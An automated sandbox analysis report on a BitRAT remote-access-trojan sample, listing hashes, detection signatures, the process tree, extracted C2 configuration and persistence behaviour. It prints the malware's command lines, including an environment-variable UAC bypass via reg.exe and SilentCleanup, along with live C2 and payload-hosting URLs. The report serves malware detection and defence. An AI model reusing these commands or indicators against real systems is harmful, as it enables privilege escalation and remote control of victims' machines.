
Windows Analysis Report Dkvunfebdprvvugtyhevcozxmecjaaclna.exe

Overview

General Information

Sample Name: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe
Analysis ID: 490119
MD5: 0357caa3824bd63e4813a50819195fa7
SHA1: 597fccaee429d0a5cd7b1c43f4ce83e9ba15a874
SHA256: 7e575f55174bf857fbd7329e43985db8bbd23f657289c4abe710a6be3743b800
Tags: exe

Most interesting Screenshot:

Detection

BitRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected BitRAT
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hides threads from debuggers
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Installs a global mouse hook
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Dkvunfebdprvvugtyhevcozxmecjaaclna.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
    • logagent.exe (PID: 5264 cmdline: logagent.exe MD5: E2036AC444AB4AD91EECC1A80FF7212F)
    • cmd.exe (PID: 4644 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3028 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 4736 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • reg.exe (PID: 388 cmdline: reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM ' MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • schtasks.exe (PID: 4728 cmdline: schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5516 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 6428 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Dkvunfe.exe (PID: 6896 cmdline: 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
  • Dkvunfe.exe (PID: 4420 cmdline: 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe' MD5: 0357CAA3824BD63E4813A50819195FA7)
  • cleanup

Malware Configuration

Threatname: BitRat

{"Host": "u876134.nvpn.to", "Port": "2405", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "b8f58c3067916bbfb50766aa8bddd42c", "Tor Process Name": "tor"}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\efnuvkD.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmp
Rule: JoeSecurity_BitRAT
Description: Yara detected BitRAT
Author: Joe Security

Source: Process Memory Space: logagent.exe PID: 5264
Rule: JoeSecurity_BitRAT
Description: Yara detected BitRAT
Author: Joe Security

Unpacked PEs

Source: 17.2.logagent.exe.10410000.0.raw.unpack
Rule: JoeSecurity_BitRAT
Description: Yara detected BitRAT
Author: Joe Security

Source: 17.2.logagent.exe.10410000.0.unpack
Rule: JoeSecurity_BitRAT
Description: Yara detected BitRAT
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmp | Malware Configuration Extractor: BitRat {"Host": "u876134.nvpn.to", "Port": "2405", "Tor Port": "0", "Install Dir": "0", "Install File": "0", "Communication Password": "b8f58c3067916bbfb50766aa8bddd42c", "Tor Process Name": "tor"}
Multi AV Scanner detection for submitted file
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Virustotal: Detection: 29%
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | ReversingLabs: Detection: 33%
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Virustotal: Detection: 29%
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | ReversingLabs: Detection: 33%
Machine Learning detection for sample
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Joe Sandbox ML: detected
Source: logagent.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49693 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49707 version: TLS 1.2

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: u876134.nvpn.to
Source: Joe Sandbox View | ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View | IP Address: 194.5.98.145 194.5.98.145
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233
Source: global traffic | TCP traffic: 192.168.2.3:49703 -> 194.5.98.145:2405
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.377269532.0000000003B2C000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034373732827177/Dkvunfe
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.519562211.000000000083C000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034373732827177/Dkvunfebdprvvugtyhevcoz
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe, 00000000.00000003.326332059.0000000003560000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/870016612722434110/891034P
Source: logagent.exe, logagent.exe, 00000011.00000002.694193715.0000000010410000.00000040.00000001.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_10425782 WSARecv,17_2_10425782
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49693 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: C:\Windows\SysWOW64\logagent.exe | Windows user hook set: 0 mouse low level NULL
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Users\Public\Libraries\efnuvkD.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_03500A8C 0_3_03500A8C
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_104170B3 17_2_104170B3
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_104213B9 17_2_104213B9
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1069C54E 17_2_1069C54E
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1041EA72 17_2_1041EA72
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1069DCD0 17_2_1069DCD0
Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 106A09D0 appears 86 times
Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 106C9C3C appears 416 times
Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 10421DDD appears 171 times
Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 1069A19C appears 129 times
Source: C:\Windows\SysWOW64\logagent.exe | Code function: String function: 105E8230 appears 85 times
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Dkvunfe.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Dkvunfe.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 7E575F55174BF857FBD7329E43985DB8BBD23F657289C4ABE710A6BE3743B800
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Virustotal: Detection: 29%
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | File read: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe 'C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe'
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\logagent.exe logagent.exe
Source: unknown | Process created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe'
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: unknown | Process created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe 'C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe'
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\logagent.exe logagent.exe
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dkvunfebdprvvugtyhevcozxmecjaac[1]
Source: classification engine | Classification label: mal100.troj.evad.winEXE@25/10@23/3
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\logagent.exe | Mutant created: \Sessions\1\BaseNamedObjects\b96f41fcd9a1a5760f850e7ce8c7cb16
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:496:120:WilError_01
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_10432D5E __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,17_2_10432D5E
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: logagent.exe | String found in binary or memory: set-addPolicy
Source: logagent.exe | String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\logagent.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\logagent.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\logagent.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\logagent.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E0B78 push 004157ADh; ret 0_3_034E0BBD
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F8B00 push 0042D72Bh; ret 0_3_034F8B3B
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034FAB00 push 0042F734h; ret 0_3_034FAB44
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034EBB24 push 0042074Ah; ret 0_3_034EBB5A
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F9BA4 push 0042E7E6h; ret 0_3_034F9BF6
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E9A04 push ecx; mov dword ptr [esp], edx 0_3_034E9A09
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034EC2A8 push 00420EBCh; ret 0_3_034EC2CC
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F6144 push 0042ADFCh; ret 0_3_034F620C
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_03517178 push ecx; mov dword ptr [esp], edx 0_3_0351717C
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034D2124 push 00406D67h; ret 0_3_034D2177
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E01D0 push 00414E2Eh; ret 0_3_034E023E
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034FA04C push 0042EC60h; ret 0_3_034FA070
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E283C push ecx; mov dword ptr [esp], edx 0_3_034E2841
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E2880 push ecx; mov dword ptr [esp], edx 0_3_034E2885
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E271C push ecx; mov dword ptr [esp], edx 0_3_034E2721
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034EA73C push 0041F3CFh; ret 0_3_034EA7DF
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034EC650 push 0042127Bh; ret 0_3_034EC68B
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_0350160C push 0043625Fh; ret 0_3_0350166F
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034D2EF0 push 00407B1Ah; ret 0_3_034D2F2A
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F955C push 0042E170h; ret 0_3_034F9580
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034DA584 push 0040F198h; ret 0_3_034DA5A8
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F7DB0 push 0042C9D0h; ret 0_3_034F7DE0
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034ECC00 push 0042182Bh; ret 0_3_034ECC3B
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F9C00 push 0042E820h; ret 0_3_034F9C30
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034D9C3C push 0040E9AAh; ret 0_3_034D9DBA
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034E24C0 push ecx; mov dword ptr [esp], edx 0_3_034E24C5
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_034F6CD0 push 0042B907h; ret 0_3_034F6D17
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Code function: 0_3_0350848C push ecx; mov dword ptr [esp], ecx 0_3_03508490
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1069A4A9 push ecx; ret 17_2_1069A4BC
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_1069B486 push ecx; ret 17_2_1069B499
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_106C9C3C push eax; ret 17_2_106C9C5A
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: .....
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ......
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: .....
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ....
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ......
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ....
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ......
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: ......
Source: Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Static PE information: section name: .....
Source: Dkvunfe.exe.0.dr | Static PE information: section name: .....
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ......
Source: Dkvunfe.exe.0.dr | Static PE information: section name: .....
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ....
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ......
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ....
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ......
Source: Dkvunfe.exe.0.dr | Static PE information: section name: ......
Source: Dkvunfe.exe.0.dr | Static PE information: section name: .....
Source: C:\Windows\SysWOW64\logagent.exe | Code function: 17_2_107F2730 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,17_2_107F2730
Source: initial sample | Static PE information: section where entry point is pointing to: ......

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | File created: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dkvunfe
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Dkvunfe
Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\logagent.exe TID: 7148 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\logagent.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\logagent.exe | Window / User API: threadDelayed 2013
Source: C:\Windows\SysWOW64\logagent.exe | Window / User API: threadDelayed 375
